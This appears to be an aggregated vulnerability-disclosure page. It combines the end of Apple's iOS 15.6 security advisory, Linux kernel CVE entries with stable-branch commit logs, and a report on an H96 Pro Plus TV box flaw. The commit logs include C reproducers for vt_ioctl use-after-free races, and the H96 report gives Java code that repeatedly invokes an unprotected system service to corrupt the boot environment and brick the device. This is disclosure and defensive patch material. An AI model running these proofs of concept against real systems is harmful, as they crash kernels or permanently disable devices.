(all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to leak sensitive user informationDescription: A memory initialization issue was addressed withimproved memory handling.CVE-2022-32823Multi-TouchAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A type confusion issue was addressed with improved statehandling.CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)PluginKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to read arbitrary filesDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32838: Mickey Jin (@patch1t) of Trend MicroSafari ExtensionsAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Visiting a maliciously crafted website may leak sensitivedataDescription: The issue was addressed with improved UI handling.CVE-2022-32784: Young Min Kim of CompSec Lab at Seoul NationalUniversitySoftware UpdateAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A user in a privileged network position can track a user’sactivityDescription: This issue was addressed by using HTTPS when sendinginformation over the network.CVE-2022-32857: Jeffrey Paul (sneak.berlin)WebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Visiting a website that frames malicious content may lead toUI spoofingDescription: The issue was addressed with improved UI handling.WebKit Bugzilla: 239316CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.WebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.WebKit Bugzilla: 240720CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro ZeroDay InitiativeWebRTCAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 242339CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence teamWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An app may be able to cause unexpected system termination orwrite kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32837: Wang Yu of CyberservalWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote user may be able to cause unexpected systemtermination or corrupt kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32847: Wang Yu of CyberservalAdditional recognition802.1XWe would like to acknowledge Shin Sun of National Taiwan Universityfor their assistance.AppleMobileFileIntegrityWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.configdWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.6 and iPadOS 15.6".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuMACgkQeC9qKD1prhhc5hAA2emrXEYGmfH1M/gji0MOPflW+wrr0y8buntNyeJYFQbf1xgGkr9hmHlMDkROvVCXDzuMyH9QDOPNFGPqBTAe/5cL+auNq497f/vGVjEOZ09Y4vC/FVBBklgokQND7CoWBhk99PgNxVdJyzkeKhBEs9JrNaIyGVqg8tChTWWghRzyyyQfHpSQfwj1M9042Kj8w9hi4SrY9R8Oe+QrcCYw/lYo3yO6WIUfajzIs/urT175BFedXS+9l4cK6srMpa/n67w3XZU9psQBVddlkVDymx1c5Lzuo84haM7TYNddOYDVluP+676Uq0vj5E24vTuGLS+vdDlJri6WMJv2d7NZ8dtJAVhPioP3ThGGsAXdpT/PmNbkc5R0RbiVTKs/2CDK4+raGHlOz6leuEfUJtUD1rHLI5n21XBQY1HOvwB9CDqGc5l7FpRoMdajDY/8yaIbWKVu1iycA2NAsxfyc9u1QTwwluGmzelpo9XdAWIZ17j6Dkalta9scCQbakHz3M1PSAYw4ljfGuYYiHElAKuZn/daeAUKZ0zMJOVdHtecliJbV3VlqMzaOKqmgXWNoBOwCow8Tj80F2dFNTvlQe91L8r7NeQAo7KCzEXbVSQqfemojtrREl5BvmWS9s7+QxqDWAHSUr+WakmKTESMA3DTlZBhBbUXE+uNRrEwboUQKeI==Nnrk-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-1

A race condition in the Linux kernel before 5.5.7 involving VT_RESIZEX could lead to a NULL pointer dereference and general protection fault.

CVE-2020-36558

A race condition in the Linux kernel before 5.6.2 between the VT_DISALLOCATE ioctl and closing/opening of ttys could lead to a use-after-free.

commit 9fbe5c87eaa9b72db08425c52c373eb5f6537a0a Author: Greg Kroah-Hartman Date: Thu Apr 2 08:02:32 2020 +0200 Linux 5.6.2 commit cea1c66b816e4f13ad7609cd0082e8f1ff98de0f Author: Georg Müller Date: Mon Feb 3 21:11:06 2020 +0100 platform/x86: pmc\_atom: Add Lex 2I385SW to critclk\_systems DMI table commit 95b31e35239e5e1689e3d965d692a313c71bd8ab upstream. The Lex 2I385SW board has two Intel I211 ethernet controllers. Without this patch, only the first port is usable. The second port fails to start with the following message: igb: probe of 0000:02:00.0 failed with error -2 Fixes: 648e921888ad ("clk: x86: Stop marking clocks as CLK\_IS\_CRITICAL") Tested-by: Georg Müller Signed-off-by: Georg Müller Reviewed-by: Hans de Goede Signed-off-by: Andy Shevchenko Signed-off-by: Greg Kroah-Hartman commit 4d8b01733206b8016f6f5c853fdf02ec07f8e25c Author: Eric Biggers Date: Sat Mar 21 20:43:05 2020 -0700 vt: vt\_ioctl: fix use-after-free in vt\_in\_use() commit 7cf64b18b0b96e751178b8d0505d8466ff5a448f upstream. vt\_in\_use() dereferences console\_driver->ttys\[i\] without proper locking. This is broken because the tty can be closed and freed concurrently. We could fix this by using 'READ\_ONCE(console\_driver->ttys\[i\]) != NULL' and skipping the check of tty\_struct::count. But, looking at console\_driver->ttys\[i\] isn't really appropriate anyway because even if it is NULL the tty can still be in the process of being closed. Instead, fix it by making vt\_in\_use() require console\_lock() and check whether the vt is allocated and has port refcount > 1. This works since following the patch "vt: vt\_ioctl: fix VT\_DISALLOCATE freeing in-use virtual console" the port refcount is incremented while the vt is open. Reproducer (very unreliable, but it worked for me after a few minutes): #include #include int main() { int fd, nproc; struct vt\_stat state; char ttyname\[16\]; fd = open("/dev/tty10", O\_RDONLY); for (nproc = 1; nproc < 8; nproc \*= 2) fork(); for (;;) { sprintf(ttyname, "/dev/tty%d", rand() % 8); close(open(ttyname, O\_RDONLY)); ioctl(fd, VT\_GETSTATE, &state); } } KASAN report: BUG: KASAN: use-after-free in vt\_in\_use drivers/tty/vt/vt\_ioctl.c:48 \[inline\] BUG: KASAN: use-after-free in vt\_ioctl+0x1ad3/0x1d70 drivers/tty/vt/vt\_ioctl.c:657 Read of size 4 at addr ffff888065722468 by task syz-vt2/132 CPU: 0 PID: 132 Comm: syz-vt2 Not tainted 5.6.0-rc5-00130-g089b6d3654916 #13 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223\_100556-anatol 04/01/2014 Call Trace: \[...\] vt\_in\_use drivers/tty/vt/vt\_ioctl.c:48 \[inline\] vt\_ioctl+0x1ad3/0x1d70 drivers/tty/vt/vt\_ioctl.c:657 tty\_ioctl+0x9db/0x11b0 drivers/tty/tty\_io.c:2660 \[...\] Allocated by task 136: \[...\] kzalloc include/linux/slab.h:669 \[inline\] alloc\_tty\_struct+0x96/0x8a0 drivers/tty/tty\_io.c:2982 tty\_init\_dev+0x23/0x350 drivers/tty/tty\_io.c:1334 tty\_open\_by\_driver drivers/tty/tty\_io.c:1987 \[inline\] tty\_open+0x3ca/0xb30 drivers/tty/tty\_io.c:2035 \[...\] Freed by task 41: \[...\] kfree+0xbf/0x200 mm/slab.c:3757 free\_tty\_struct+0x8d/0xb0 drivers/tty/tty\_io.c:177 release\_one\_tty+0x22d/0x2f0 drivers/tty/tty\_io.c:1468 process\_one\_work+0x7f1/0x14b0 kernel/workqueue.c:2264 worker\_thread+0x8b/0xc80 kernel/workqueue.c:2410 \[...\] Fixes: 4001d7b7fc27 ("vt: push down the tty lock so we can see what is left to tackle") Cc: # v3.4+ Acked-by: Jiri Slaby Signed-off-by: Eric Biggers Link: https://lore.kernel.org/r/20200322034305.210082-3-ebiggers@kernel.org Signed-off-by: Greg Kroah-Hartman commit 903f879e510838969d93506eea1a498fc9928c51 Author: Eric Biggers Date: Sat Mar 21 20:43:04 2020 -0700 vt: vt\_ioctl: fix VT\_DISALLOCATE freeing in-use virtual console commit ca4463bf8438b403596edd0ec961ca0d4fbe0220 upstream. The VT\_DISALLOCATE ioctl can free a virtual console while tty\_release() is still running, causing a use-after-free in con\_shutdown(). This occurs because VT\_DISALLOCATE considers a virtual console's 'struct vc\_data' to be unused as soon as the corresponding tty's refcount hits 0. But actually it may be still being closed. Fix this by making vc\_data be reference-counted via the embedded 'struct tty\_port'. A newly allocated virtual console has refcount 1. Opening it for the first time increments the refcount to 2. Closing it for the last time decrements the refcount (in tty\_operations::cleanup() so that it happens late enough), as does VT\_DISALLOCATE. Reproducer: #include #include #include #include int main() { if (fork()) { for (;;) close(open("/dev/tty5", O\_RDWR)); } else { int fd = open("/dev/tty10", O\_RDWR); for (;;) ioctl(fd, VT\_DISALLOCATE, 5); } } KASAN report: BUG: KASAN: use-after-free in con\_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278 Write of size 8 at addr ffff88806a4ec108 by task syz\_vt/129 CPU: 0 PID: 129 Comm: syz\_vt Not tainted 5.6.0-rc2 #11 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223\_100556-anatol 04/01/2014 Call Trace: \[...\] con\_shutdown+0x76/0x80 drivers/tty/vt/vt.c:3278 release\_tty+0xa8/0x410 drivers/tty/tty\_io.c:1514 tty\_release\_struct+0x34/0x50 drivers/tty/tty\_io.c:1629 tty\_release+0x984/0xed0 drivers/tty/tty\_io.c:1789 \[...\] Allocated by task 129: \[...\] kzalloc include/linux/slab.h:669 \[inline\] vc\_allocate drivers/tty/vt/vt.c:1085 \[inline\] vc\_allocate+0x1ac/0x680 drivers/tty/vt/vt.c:1066 con\_install+0x4d/0x3f0 drivers/tty/vt/vt.c:3229 tty\_driver\_install\_tty drivers/tty/tty\_io.c:1228 \[inline\] tty\_init\_dev+0x94/0x350 drivers/tty/tty\_io.c:1341 tty\_open\_by\_driver drivers/tty/tty\_io.c:1987 \[inline\] tty\_open+0x3ca/0xb30 drivers/tty/tty\_io.c:2035 \[...\] Freed by task 130: \[...\] kfree+0xbf/0x1e0 mm/slab.c:3757 vt\_disallocate drivers/tty/vt/vt\_ioctl.c:300 \[inline\] vt\_ioctl+0x16dc/0x1e30 drivers/tty/vt/vt\_ioctl.c:818 tty\_ioctl+0x9db/0x11b0 drivers/tty/tty\_io.c:2660 \[...\] Fixes: 4001d7b7fc27 ("vt: push down the tty lock so we can see what is left to tackle") Cc: # v3.4+ Reported-by: syzbot+522643ab5729b0421998@syzkaller.appspotmail.com Acked-by: Jiri Slaby Signed-off-by: Eric Biggers Link: https://lore.kernel.org/r/20200322034305.210082-2-ebiggers@kernel.org Signed-off-by: Greg Kroah-Hartman commit 4e1c0484b7f84f55713b1eb1faf641ae49496bb1 Author: Eric Biggers Date: Mon Feb 24 00:03:26 2020 -0800 vt: vt\_ioctl: remove unnecessary console allocation checks commit 1aa6e058dd6cd04471b1f21298270014daf48ac9 upstream. The vc\_cons\_allocated() checks in vt\_ioctl() and vt\_compat\_ioctl() are unnecessary because they can only be reached by calling ioctl() on an open tty, which implies the corresponding virtual console is allocated. And even if the virtual console \*could\* be freed concurrently, then these checks would be broken since they aren't done under console\_lock, and the vc\_data is dereferenced before them anyway. So, remove these unneeded checks to avoid confusion. Signed-off-by: Eric Biggers Link: https://lore.kernel.org/r/20200224080326.295046-1-ebiggers@kernel.org Signed-off-by: Greg Kroah-Hartman commit e50d4c4fecccef226a86e2a6be20ad376138e9ec Author: Jiri Slaby Date: Wed Feb 19 08:39:48 2020 +0100 vt: switch vt\_dont\_switch to bool commit f400991bf872debffb01c46da882dc97d7e3248e upstream. vt\_dont\_switch is pure boolean, no need for whole char. Signed-off-by: Jiri Slaby Link: https://lore.kernel.org/r/20200219073951.16151-6-jslaby@suse.cz Signed-off-by: Greg Kroah-Hartman commit 270db0384de5867ca046c09418f129f5f78072f5 Author: Jiri Slaby Date: Wed Feb 19 08:39:44 2020 +0100 vt: ioctl, switch VT\_IS\_IN\_USE and VT\_BUSY to inlines commit e587e8f17433ddb26954f0edf5b2f95c42155ae9 upstream. These two were macros. Switch them to static inlines, so that it's more understandable what they are doing. Signed-off-by: Jiri Slaby Link: https://lore.kernel.org/r/20200219073951.16151-2-jslaby@suse.cz Signed-off-by: Greg Kroah-Hartman commit 3f0e2212be7c46a4a43df30c1dc4618e28ad94f9 Author: Jiri Slaby Date: Wed Feb 19 08:39:43 2020 +0100 vt: selection, introduce vc\_is\_sel commit dce05aa6eec977f1472abed95ccd71276b9a3864 upstream. Avoid global variables (namely sel\_cons) by introducing vc\_is\_sel. It checks whether the parameter is the current selection console. This will help putting sel\_cons to a struct later. Signed-off-by: Jiri Slaby Link: https://lore.kernel.org/r/20200219073951.16151-1-jslaby@suse.cz Signed-off-by: Greg Kroah-Hartman commit aab76df91483a8803a001c3f5e25b0a8d43f8151 Author: Lanqing Liu Date: Mon Mar 16 11:13:33 2020 +0800 serial: sprd: Fix a dereference warning commit efc176929a3505a30c3993ddd393b40893649bd2 upstream. We should validate if the 'sup' is NULL or not before freeing DMA memory, to fix below warning. "drivers/tty/serial/sprd\_serial.c:1141 sprd\_remove() error: we previously assumed 'sup' could be null (see line 1132)" Fixes: f4487db58eb7 ("serial: sprd: Add DMA mode support") Reported-by: Dan Carpenter Signed-off-by: Lanqing Liu Cc: stable Link: https://lore.kernel.org/r/e2bd92691538e95b04a2c2a728f3292e1617018f.1584325957.git.liuhhome@gmail.com Signed-off-by: Greg Kroah-Hartman commit 7908d2658f92b5164d715959d51ebb88f4ad891b Author: Johannes Berg Date: Sun Mar 29 22:50:06 2020 +0200 mac80211: fix authentication with iwlwifi/mvm commit be8c827f50a0bcd56361b31ada11dc0a3c2fd240 upstream. The original patch didn't copy the ieee80211\_is\_data() condition because on most drivers the management frames don't go through this path. However, they do on iwlwifi/mvm, so we do need to keep the condition here. Cc: stable@vger.kernel.org Fixes: ce2e1ca70307 ("mac80211: Check port authorization in the ieee80211\_tx\_dequeue() case") Signed-off-by: Johannes Berg Signed-off-by: David S. Miller Cc: Woody Suwalski Signed-off-by: Greg Kroah-Hartman commit cb7cd49c9c281cf00fa38a53c2e6ccf708318b87 Author: Daniel Borkmann Date: Fri Jan 24 14:21:14 2020 +0000 bpf: update jmp32 test cases to fix range bound deduction \[ no upstream commit \] Since commit f2d67fec0b43 ("bpf: Undo incorrect \_\_reg\_bound\_offset32 handling") has been backported to stable, we also need to update related test cases that started to (expectedly) fail on stable. Given the functionality has been reverted we need to move the result to REJECT. Reported-by: Naresh Kamboju Signed-off-by: Daniel Borkmann Signed-off-by: Greg Kroah-Hartman

CVE-2020-36557

An issue was discovered in H96 Smart TV Box H96 Pro Plus allows attackers to corrupt files via calls to the saveDeepColorAttr service.unk

\[Vulnerability in H96 Pro Plus Smart TV Box\]

I would like to report a security vulnerability in H96 Smart TV Box ( specs: H96 Pro Plus Smart TV Box Android 7.1 2gb/16gb Amlogic S912 Octa Core 1000M LAN 3D 4K Mini PC Streaming Player with Dual WIFI 2.4GHz/5 GHz Bluetooth 4.1).

The vulnerability allows to totally break down the device after invoking an API with certain parameters for large number of times (>10000). After repeated invocation, the invocation leads to overwriting a critical system file under "dev/block/env", thus causing the boot up environment settings to be corrupt. As a result, the device will not be able to reboot - even under safe mode.

We suspect the vulnerability spans other Amlogic devices that contains the same vulnerable API.

This vulnerability is due to the following:

The device introduces a custom API in the SystemControl system service “saveDeepColorAttr"” which takes 2 string arguments. The API is not protected at all, thus can be invoked by any 3rd party app . After invoking the API, the second string argument will be appended to the file (dev/block/env). After a sufficiently large number of invocations, the file will be corrupt.

We can cause the problem by invoking the following method repeatedly:

Class ServiceManager = Class.forName("android.os.ServiceManager");

Method getService = ServiceManager.getMethod("getService", String.class);

mRemote = (IBinder) getService.invoke(null,"system\_control");

Parcel localParcel1 = Parcel.obtain();

Parcel localParcel2 = Parcel.obtain();

localParcel1.writeInterfaceToken("droidlogic.ISystemControlService");

localParcel1.writeString("1080p60hz");

localParcel1.writeString("RandomlyLongString");

mRemote.transact(0x2f, localParcel1, localParcel2, 0); //0x2f corresponds to the API saveDeepColorAttr

localParcel2.recycle();

localParcel1.recycle();

Tag

#wifi